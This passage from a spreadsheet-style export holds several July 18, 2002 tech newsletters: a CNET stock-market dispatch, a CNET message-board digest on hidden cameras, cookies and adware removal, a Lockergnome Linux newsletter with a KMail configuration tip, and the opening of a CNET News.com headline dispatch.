    <t>\n\n![CNET Investor Dispatch]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n|  |  **Quote Lookup**  \nEnter symbol:  \n  \n* Symbol Lookup  \nQuotes delayed 20+ minutes  \n---  \n  \n![Investor Sections]([URL]http://www.cnet.com[/URL]  \nÂ• **My Portfolio**  \nÂ• **Broker Reports**  \nÂ• **IPOs**  \nÂ• **Splits**  \nÂ• **Messages**\n\n![Tech Winners]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  | STIZ | 3.5 | 45.77%  \n---|---|---|---  \n![]([URL]http://home.cnet.com[/URL]  | IIJI | 4.75 | 35.71%  \n![]([URL]http://home.cnet.com[/URL]  | BOYD | 4.24 | 35.03%  \n![]([URL]http://home.cnet.com[/URL]  | INPH | 3.94 | 31.25%  \n![]([URL]http://home.cnet.com[/URL]  | EBSC | 3.0 | 26.00%  \n  \n![Tech Losers]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  | NSIT | 13.36 |\n-43.72%  \n---|---|---|---  \n![]([URL]http://home.cnet.com[/URL]  | ITRI | 14.82 |\n-32.79%  \n![]([URL]http://home.cnet.com[/URL]  | GZBX | 2.28 |\n-25.49%  \n![]([URL]http://home.cnet.com[/URL]  | TTEK | 10.4 |\n-24.03%  \n![]([URL]http://home.cnet.com[/URL]  | GDYS | 4.37 |\n-23.20%  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft **  \n---  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \nJuly 18, 2002  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] DJIA  \n8409.49  -132.99 | ![]([URL]http://home.cnet.com[/URL]\nNASDAQ  \n1356.95  -40.30 | ![]([URL]http://home.cnet.com[/URL]\nS&amp;P; 500  \n881.56  -24.48 | ![]([URL]http://home.cnet.com[/URL] CNET\nTECH  \n982.84  -24.59  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n**Techs lose again with Seibel earnings miss, AOL questions**  \nSiebel Systems fell short of Wall Street's earnings expectations and offered a\nworse-than-expected outlook, helping to depress technology shares Thursday.\n\nDespite a forecast from IBM in line with analyst expectations, investors\nseemed more focused on reports of a possible management shake-up at AOL Time\nWarner and on a Washington Post story questioning accounting methods at\nAmerica Online. CNET's Tech index shed 24.59 points, or 2.45 percent, to close\nat 982.84. The tech-heavy Nasdaq composite index fell 40.30 points, or 2.88\npercent, to close at 1,356.95.\n\nAmid news The Conference Board's index of leading economic indicators held\nsteady in June, broader markts also headed south. The Dow Jones industrials\ndropped 133.0 points, or 1.56 percent, to close at 8,409.4. The S&amp;P; 500 slid\n24.48 points, or 2.7 percent, to close at 881.56--another multi-year low.  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![Top Investor News]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**AOL used unconventional business practices-Post**  \nAmerica Online Inc. boosted its revenue figures through unconventional deals\nfrom 2000 to 2002, before and after its acquisition of Time Warner Inc., the\nWashington Post reported on Thursday. A chart printed in conjunction with the\nPost article shows a total of $270.1 million in unconventional deals.  \n **AOL TIME WARNER INC 12.45 -5.03%**\n\n**IBM posts sharp drop in quarterly profits**  \nInternational Business Machines Corp. on Wednesday said it eked out a second-\nquarter profit of just a few pennies a share as the world's largest computer\nmaker took a $1.4 billion charge to exit money-losing businesses and cut jobs.\nBut even without the big charge, earnings at IBM, which sells everything from\ncomputer software to microchips to computer services, fell sharply as\ncorporations concerned about their own bottom lines cut back on technology\nspending.  \n **INTL BUSINESS MACHINES 72.05 1.92%**\n\n**Nokia sees slight rise in Q3 handset sales vs Q2**  \nFinnish telecom equipment maker Nokia said on Thursday it expected a slight\nrise in handset unit sales for both itself and the industry in the third\nquarter versus the April-June period. "it will be a reasonable quarter, but it\nwill not represent such a dramatic growth as what might have been seen in some\nprevious years," Chief Executive Jorma Ollila told a conference call following\nthe firm's second-quarter result.  \n **NOKIA CORP ADS 13.33 -5.59%**\n\n**Also from CNET**  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \nReal-time stock quotes from CNET News.com Investor.  \n30-day free trial!\n\n![Today's Broker Reports]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**J.P. Morgan stays cautious toward Qwest in tech notes 7/18/02**  \nAnalyst Marc Crossman repeats a "market performer" rating on the telecom firm\nand further lowers his estimates on what he sees as continued deterioration of\nQwest's local and long-distance businesses. Crossman says Qwest could violate\na bank agreement by the end of this quarter if it doesn't close a significant\nasset sale. And he argues the firm faces a funding shortage next year that\ncan't be satisfied by selling its eastern directories businesses alone.  \n **QWEST COMMUNICATIONS INTL INC 2.74 14.64%**  \nVisit the Brokerage Center\n\n![CEO Wealth Meter]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Dell: PC Market Slow and May Stay So**  \nThe stumbling economy continues to dampen demand for personal computers and\ncould do so for the rest of the year, Dell Computer Corp. Chief Operating\nOfficer Kevin Rollins said on Thursday. Despite the slow market, No. 2\ncomputer maker Dell is gaining market share, partly because of the recent\nmerger of Hewlett Packard Co. and Compaq Computer Corp., Rollins told\nreporters after Dell's annual shareholder meeting here.  \n **DELL COMPUTER CORP 26.0500 -1.10%**  \nVisit the CEO Wealth Meter  \n\n  \n  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![Crucial Clicks]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://a.r.tv.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | **Digital photography starter kit**  \nThis guide to digital photos will show you the best products to take your\nimages from snap to finish.  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \nÂ• Panasonic's littlest Lumix  \nÂ• Minolta"s 4-megapixel Dimage F100  \n  \n![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n**Most popular products**  \n![]([URL]http://home.cnet.com[/URL]  \n**Digital cameras**  \n![]([URL]http://home.cnet.com[/URL]  \n1\. Canon PowerShot G2  \n![]([URL]http://home.cnet.com[/URL]  \n2\. Canon PowerShot S30  \n![]([URL]http://home.cnet.com[/URL]  \n3\. Canon PowerShot S40  \n![]([URL]http://home.cnet.com[/URL]  \n4\. Canon PowerShot A40  \n![]([URL]http://home.cnet.com[/URL]  \n5\. Sony Cyber Shot DSC-F707  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL] **See all most popular\ncameras**  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n| **NEW!** CNET professional e-mail publishing for just $24.95/month. **FREE\nfor 30 days. Click here!**  \n---  \n  \n![Sign up for more free newsletters from\nCNET!]([URL]http://a.r.tv.com[/URL]  \nThe e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com\n\nUnsubscribe | Manage My Subscriptions | FAQ | Advertise\n\nPlease send any questions, comments, or concerns to dispatchfeedback@news.com.  \n![]([URL]http://www.zdnet.com[/URL] ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]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26&amp;ISSUE=2002-07-18)  \n  \n---|---  \n.  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-cnet-newsletters@example.com\nFrom: CNET Message Boards &lt;Online#3.20483.52-WfysgP14zsqzURRR.1@newsletter.online.com&gt;\nDate: Thu, 18 Jul 2002 13:46:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 13:46:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Message Boards &lt;Online#3.20483.52-WfysgP14zsqzURRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET: Miniature cameras and privacy laws</t>
  </si>
  <si>
    <t>![CNET Message Boards Newsletter]([URL]http://www.cnet.com[/URL]  \n| ![](/b.gif)  \n  \n---  \n![](/b.gif)  \n| ![](/b.gif)  \n| ![](/b.gif)  \n  \n![](/b.gif)  \n  \n![]([URL]http://a.r.tv.com[/URL]  \n\n|  ![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nMessages All CNET The Web  \n---  \n  \n![More Forums]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n1\. Wireless  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n2\. Computer Help  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n3\. Speakeasy  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n4\. Windows 98  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n5\. PC Hardware  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n6\. Windows Me  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n7\. Computer Newbies  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n8\. Downloads  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n9\. Windows XP  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n10.Virus &amp; Security  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n![Hot Products]([URL]http://www.cnet.com[/URL]  \nCheck out the User Opinions on these Hot Products and then submit one of your\nown.  \n  \n  \n---  \n84% ![User Opinions]([URL]http://download.cnet.com[/URL]\n16%![]([URL]http://download.cnet.com[/URL] (19 votes)  \nSony DCR-TRV50  \nIn Electronics: Camcorders  \n94% ![User Opinions]([URL]http://download.cnet.com[/URL]\n6%![]([URL]http://download.cnet.com[/URL] (2878 votes)  \nAd-aware  \nIn Downloads: System Utilities  \n77% ![User Opinions]([URL]http://download.cnet.com[/URL]\n23%![]([URL]http://download.cnet.com[/URL] (263 votes)  \nGuard-IE Ad Blocking Privacy Suite and Popup Killer  \nIn Downloads: Online Privacy  \n**More User Opinions**  \n  \n  \n**Computer Problems?** Try our Live Support from a Live technician!  \n  \n---  \n![]([URL]http://www.tech24.com[/URL]  \n---  \n![]([URL]http://www.tech24.com[/URL] |  \nType here and click go.  \n  \n  \n![]([URL]http://www.tech24.com[/URL] |\n![]([URL]http://www.tech24.com[/URL]  \n![]([URL]http://www.tech24.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![](/b.gif)  \n  \n---  \n![](/b.gif)  \n  \n![](/b.gif)  \n  \n| ![](/b.gif)  \n  \n---  \n![](/b.gif) | ![](/b.gif)  \n| ![](/b.gif) |  | ![](/b.gif)  \n|  | July 18, 2002  \n  \n---  \n|  **Dear Readers,**  \nI'm sure you've seen those annoying X-10 cameras ads popping up left and right\nwhile surfing the Internet. One day, out of curiosity, I decided to check this\nbothersome company's Web site. To my amazement, I found that their miniature\ncameras are pretty darn tiny, and you can mount them practically anywhere. But\nwhat does the law says about using them? I wouldn't want anyone to invade my\nprivacy with that sort of camera setup. Coincidentally, I ran across this\ninteresting discussion about this in the Boards, where members were discussing\nthese miniature cameras, called CCTVs, and the privacy concerns around them.\nSo if you want more info or would like to leave your two cents' worth about\nthis, send us a post. Besides, this information might keep you from getting\ncaught on camera in an embarrassing situation.  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n---  \nLee Koo  \nCNET Community  \nGot suggestions? Email me: messageboards@cnet.com  \n  \n  \n![](/b.gif)  \n  \n![](/b.gif)  \n---  \n![Crucial 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Simple Questions w/Simple\nAnswers]([URL]http://www.cnet.com[/URL]  \n| ****  \n---|---  \n![](/b.gif)  \n  \n![](/b.gif)  \n  \n**Cookie, anyone?**  \nNo, not the chocolate-chip type, but small data files that are written to your\nhard drive by some Web sites when you view them in your browser. So what are\nthe benefits of cookies? Are they harmful? Can I get rid of them without\nmessing up my computer? These and many other cookie questions are answered in\nthese two discussions, so if you're curious, bite into it and find out more.\n\n  * To delete or not to delete cookies...your choice\n  * Deleting cookies and keeping them off my computer\n  * More Computer Help discussions\n\n**My browser home page gets hijacked every time!**  \nHave you ever checked out a Web site only to find that the home page on your\nInternet browser had been hijacked by it and you can't change it back? This\nhappened to one member. Fortunately for him, the expert advisor of the forums\nwas there for his rescue. Take a look at how he and others solved the problem.\nMore Computer Newbies discussions\n\n**Pop-up ads, begone!**  \nIf you've downloaded some software in the past and noticed an unreasonable\namount of pop-up ads, you may have picked up unauthorized software that serves\npop-up ads while you surf. This can be pretty frustrating and annoying. Find\nout here about these unauthorized attachments and how to get rid of nasty pop-\nup ads.\n\n  * Removing Gator junk from my PC\n  * More Security and Virus Alerts discussions \n\n**Digital vs. analog camcorders**  \nGetting ready for that long summer vacation in Tahiti? Want to buy a camcorder\nand capture the whole thing on videotape? When you need buying advice, what\nbetter place to turn than to the forums? You'll always find someone there with\nadvice that'll make your experience a little easier. In this thread, a member\nwondered what type of camcorder would be the best for his needs, digital or\nanalog. If you're in the market for a new camcorder or already have one and\ncan offer some tips, take a look at this discussion and add your voice. More\nConsumer Electronic &amp; Digital Camera discussions\n\n![Simple Questions w/Simple Answers]([URL]http://www.cnet.com[/URL]  \n| ****  \n---|---  \n![](/b.gif)  \n  \n![](/b.gif)  \n  \n* | **Where's ScanDisk for Windows XP?**  \n  \n---|---  \n* | **Now that Audiogalaxy has gone, what next?**  \n  \n* | **Brand-new memory is missing/disappearing!**  \n  \n  \n![Help your fellow Boarders]([URL]http://www.cnet.com[/URL]  \n| ****  \n---|---  \n![](/b.gif)  \n  \n![](/b.gif)  \n  \n* | **Should I convert to Windows XP?**  \nfrom Melinda Douch  \n---|---  \n**\n\n* **| **Cannot forward pictures in e-mail**  \nfrom Mariann Eppolito  \n* | **A bunch of drive problems**  \nfrom Darren Harris  \n  \n![]([URL]http://home.cnet.com[/URL]\n![]([URL]http://home.cnet.com[/URL] **\n\n  * Live Tech Help. Submit your question now.\n  * CNET News.com: Top CIOs on the future of IT.\n  * Find a job you love. Over 1 million postings\n  * ZDNet: This IT director has had enough of Microsoft\n  * May Editors" Choice Award: Pioneer"s Home Theater System HTS - 910DV\n\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30&amp;ISSUE=2002-07-18)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://a.r.tv.com http://a.r.tv.com http://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download.cnet.com http://download.cnet.com http://download.cnet.com http://download.cnet.com http://download.cnet.com http://download.cnet.com http://www.tech24.com http://www.tech24.com http://www.tech24.com http://www.tech24.com http://www.tech24.com http://www.cnet.com http://home.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www.cnet.com http://www.cnet.com http://www.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lg@example.com\nFrom: Lockergnome Penguin Shell&lt;subscriptions@lockergnome.com&gt;\nDate: Thu, 18 Jul 2002 13:44:55 -0500</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 13:44:55 -0500</t>
  </si>
  <si>
    <t>[Lockergnome Penguin Shell]  Retail Ready</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![Linux\nCentral]([URL]http://www.qksrv.net[/URL]  \n  \n---  \n|\n\n  07.17.2002 PenguinREPORT  \n  \n---  \n  \n**CAREER SERVICES FROM LOCKERGNOME AND DICE.COM:** We've teamed up with\nDice.com to bring you a full service I.T. career enhancement solution. Whether\nyou are looking for your dream job or trying to hire talented people, the\nfull-featured career resource center is the place to start. Find your IT\ntalent solution today!  \n---  \n  \nI've very excited about the in-planning Penguin Shell volunteer project.\nApparently, you are too. I've received more than 100 emails from readers\nvolunteering a wide range of IT skills for charitable organizations. Linux\nusers, Windows users, even a few Mac users are ready, willing and able to\nspend their own precious off time providing qualified technical skills for a\ngood cause. I've also gotten more than two dozen suggestions for organizations\nthat might be in need of such skills. And, I've seen some very interesting\nsuggestions for names for our project. Feel free to click through on any of\nthe above links to join the ever-growing bandwagon. Do me a favor, though.\nkeep the subject lines intact. It's the only way your messages will filter and\nsort through my email system.\n\nIt looks like Apple may have crossed a line of irritation with its users.\nAccording to this article on The Register, Apple has tacked a $100 annual fee\non its previously free mac.com email service. It's also set the price for an\nOS 10.2 upgrade at $129.\n\nI won't question Apple's decision too much. Instead, it really proves how\ndifficult things have become in the tech world in the past few years.\nRevenues, by and large, are still decreasing from the pie-in-the-sky late 90s\nand early 2000\. That's left companies to scramble for new sources of income,\nsome of which were previously free. Even we at Lockergnome have felt the pinch\nin the past few years. Never fear, though. Chris has assured us that the\nnewsletters will remain free. We have, however, begun to explore alternative\nincome sources.\n\nOn a brighter note, it looks like Mandrake has found a sweet spot. According\nto their most recent shareholder's report, the third quarter was the strongest\nin the company's history, with 1.6 million Euro (1.61 million US) in revenue.\nThat doesn't put them in the black, though. According to MandrakeSoft, the\nstrong quarter will only decrease operating losses. I have to wonder how much\nof this revenue was the result of the Mandrake Linux User's Club.\n\nThe news also makes me want to pay a bit more attention to Mandrake's newest\npartnership venture, an agreement with Microtel to provide Mandrake-loaded\ncomputers for sale on WalMart.com. I would never have guessed that WalMart\nwould lead the consumer Linux machine charge. They've had Mandrake boxes\navailable for several months. Now, with the addition of both Lindows and\nMandrake-equipped computers, they seem surprisingly ahead of the retail\ncomputer pack. Let's hope for the best for all involved.\n\nHave a great Wednesday.\n\nTony Steidler-Dennison  \n\n  \n\n GnomeTWEAK  \n  \n---  \n  \n**Lockergnome readers, SAVE 50% on the Computing Encyclopedia!** Are you\nlooking for the ultimate computing resource? Discover the _Computing\nEncyclopedia_ from Smart Computing. Regular price $59, SPECIAL OFFER for\nLockergnome readers, get your set TODAY, ONLY $29.95!  \n---  \n  \n**Checking Mail With KMail**\n\nI've recently become a KDE convert - impressed enough with KDE-3 to move me\nfrom my longtime desktop friend Gnome. While I use a combination of fetchmail,\nprocmail and pine for reading and filtering my email, KMail is a strong\ncontender in the email race. As you'd guess, it's fully integrated into the\nKDE desktop, ready for a quick setup and easy use.\n\nThere's one drawback to KMail, though, in my opionion. That's that it doesn't\nautomatically check your email by default when the program is opened. As much\ntime as I spend talking about saving key and mouse strokes, you knew the\nadditional step to check your email after opening the program would be an\nirritation to this Penguin. However, changing the problem is a quick and\nsimple configuration issue.\n\nTo force KMail to check your email when opened, right-click on the KMail icon\nin your KDE panel. Select "Preferences" and the "Execute" tab. In the Execute\nwindow, change the command line to read:\n\n    kmail --check -caption "%c" %i %m\n\nThe addition of the --check option will force KMail to bring you your mail\nwhen you open the program.\n\nFewer keystrokes make a happy geek, right?\n\nRecommend It!  \nSend us a GnomeTWEAK\n\n  \n\n GnomeCORE  \n  \n---  \n  \n**Kernel Configuration - Part XIII**\n\nAs you well know, Linux is simply the most robust operating system for\nnetworking around. With its roots squarely in the network, Linux has managed\nto stay ahead of the pack in virtually every respect related to networks. It\nshould come as little suprise, then, that the network section of your Linux\nkernel configuration is dense with details and options.\n\nI will say that I warned you on Monday - there are going to be some sections\nof the kernel configuration series where I just can't give you a stock\nconfiguration that will work in every case. Networking is one of those areas.\nYou're going to have to give some thought as to how your network is or will be\nused and the level of security you want to provide (both internal and\nexternal). Then, it's a matter of finding the solutions to those options.\n\nFor security issues, I can recommend several good articles and HowTos:\n\nThe Linux Security Quickstart HowTo  \n  covers security on a high level, with a good discussion of kernel\nconfiguration issues\n\nLinux Network Security from Linux Planet  \n  a nice tutorial on network security\n\nNetwork Security with /proc/sys/net/ipv4  \n  other approaches to network security\n\nThese should get you started. Tomorrow, we'll cover telephony support in your\nLinux kernel.\n\nRecommend It!  \nSend us a GnomeCORE tip\n\n  \n\n GnomeFILE  \n  \n---  \n  \n**PyMP3Cut**\n\n  \n[URL]http://www.librelogiciel.com[/URL]\n\n"PyMP3Cut is a Python commandline tool designed to cut huge (&gt; 100MB) MP3\nfiles at high speed without requiring the extra disk space and processing time\nusually needed by visual audio editing tools, which convert the MP3 format to\nmore easily manageable formats like WAV before doing anything. It reads and\ncuts simultaneously according to the autodetected MP3 frame rate and a\ntimeline passed as a commandline argument."\n\nRecommend It!  \nSend us a GnomeFILE suggestion\n\n  \n\n GnomeVOICE  \n  \n---  \n  \n**More Windows for Linux**  \nScribbled by Ken Knull\n\n"I'm reading your Codeweavers/CrossOver project stuff, and have comments on\nanother option I use.\n\n"I have been using Win4Lin ( [URL]http://www.netraverse.com[/URL] ) for several months\nnow, on an i686 boxen which runs RH 7.2, and now also most windoze (nonXP /\nNTFS apps).\n\n"I love it, and highly recommend it, and if you'd like more details / data let\nme know."\n\nRecommend It!  \nSpeak your GnomeVOICE\n\n  \n\n GnomeCLICK  \n  \n---  \n  \n**Linux PR**\n\n[URL]http://linuxpr.com[/URL]\n\nIf the daily Linux news sites are starting to get you down, maybe it's time\nfor a change. Linux PR is an up-to-the-minute listing of events and\ndevelopments in the Linux world. The layout is attractive, with all the most\nrecent articles in descending order on the front page. It makes quick scans\neasy. The only real downside to the news on the site is that some of it is\nvery, very company-oriented - clearly the work of PR firms cranking out press\nreleases. Other than that, Linux PR is a useful site for checking in and\nkeeping up on your favorite OS.\n\nRecommend It!  \nSuggest a GnomeCLICK\n\n  \n\n|  [URL]http://www.lockergnome.com[/URL]\n\nYour subscribed e-mail address is: [qqqqqqqqqq-lg@example.com] - To\nunsubscribe or change your delivery address, please visit the subscription\nmanagement page. Use of the Gnome moniker by Penguin Shell does not imply\nendorsement of the Gnome Desktop Environment. Penguin Shell is an equal-\nopportunity desktop employer. For further information, please refer to the\nGnomeCREDITS in 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See You in\nAugust!]([URL]http://chris.pirillo.com[/URL]\n\n Tell a Friend About Us!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 Win a Digital Camera  \n\n General Feedback  \n Chris's Blog  \n E-mail the Editor  \n\n\n\nGNOMESPECIALS  \n  \n---  \n  \n Manage Your Workgroup  \n Form Pilot  \n Say the Time 5.0  \n Boomer - Stream Now  \n Create Web/CD catalog  \n Easy Web Editor  \n Kleptomania  \n Tag&amp;Rename  \n Pretty Good Solitaire  \n Visualize Color Combos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www.qksrv.net http://www.librelogiciel.com http://www.netraverse.com http://linuxpr.com http://www.lockergnome.com http://chris.pirillo.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: "CNET News.com Daily Dispatch" &lt;Online#3.20481.4a-uljJgrvQnTKdNRRR.1@newsletter.online.com&gt;\nDate: Thu, 18 Jul 2002 13:43:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 13:43:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET News.com Daily Dispatch" &lt;Online#3.20481.4a-uljJgrvQnTKdNRRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET NEWS.COM: Selling secure laptops no open-shut case</t>
  </si>
  <si>
    <t>![]([URL]http://home.cnet.com[/URL]  \n|\n\n![]([URL]http://i.i.com.com[/URL]\n![]([URL]http://ad.doubleclick.net[/URL];sz=160x600;ord=\[timestamp\]?)\n\n|  ![](/b.gif)  \n  **Search**  \n  \n  News.com All CNET     The Web  \n---  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft **  \n---  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n|  | ![In the News]([URL]http://home.cnet.com[/URL]  \n| July 18, 2002  \n  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] Selling secure laptops no open-\nshut case  \n![]([URL]http://home.cnet.com[/URL] Apple's harvest: New iPods, bigger\niMac and more  \n![]([URL]http://home.cnet.com[/URL] Microsoft unbundles directory\ntechnology  \n![]([URL]http://home.cnet.com[/URL] Pittman set to leave AOL Time\nWarner  \n![]([URL]http://home.cnet.com[/URL] Tech activists protest anti-\ncopying  \n![]([URL]http://home.cnet.com[/URL] Earnings alert: Handspring trims\nloss  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n|  | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |   **Perspectives**  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n  \n**The options party is over**  \nKenneth Broad says it's easy to see why the tech industry is fighting to keep\noptions from being expensed.  \n**Read Full Story**  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n**Selling secure laptops no open-shut case**  \nRop Gonggrijp admits that it's not a promising time to start an Internet\nprivacy company. The founder of NAH6 knows all about flops such as Privada,\nabandoned software such as PGP and SafeWeb, and struggling firms such as Zero\nKnowledge.  \nJuly 18, 2002, 4:00 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Apple's harvest: New iPods, bigger iMac and more**  \nAs the Mac faithful gather in New York, Apple CEO Steve Jobs rallies to the\ndefense of the Mac OS X operating system and trots out new hardware, including\na bigger iMac and iPods for Windows. But the company heads into murky waters\nwith its .Mac Web services plan.  \nJuly 18, 2002, 10:50 a.m. PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Microsoft unbundles directory technology**  \nMicrosoft will begin selling its directory technology as a standalone product\nseparate from the Windows operating system. Microsoft will continue to build\nin its "Active Directory" as part of Windows, but will give its customers the\nnew option of buying the technology as a separate product next year, Microsoft\nexecutives said this week. The directory technology essentially provides a\nnetwork manager with a central database to store and manage information about\nusers, computer systems and networking devices. Microsoft competes against\nNovell and Sun Microsystems in the directory-server software market.  \nJuly 18, 2002, 11:30 AM PT |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n  \n**Pittman set to leave AOL Time Warner**  \nAOL Time Warner is expected to announce after the stock markets close Thursday\nthat embattled chief operating officer Robert Pittman will relinquish his role\nas the media behemoth's No. 2 executive, according to a source close to the\ncompany. Pittman, who also serves as the interim chief exective of the\ncompany's America Online unit, could remain at the online division until a\npermanent CEO is found. But the timetable for Pittman's departure will be\nbased on his own decision, the source added. AOL Time Warner last week\nconfirmed that it hired executive search firm Spencer Stuart to head AOL's CEO\nsearch.  \nJuly 18, 2002, 12:05 PM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Tech activists protest anti-copying**  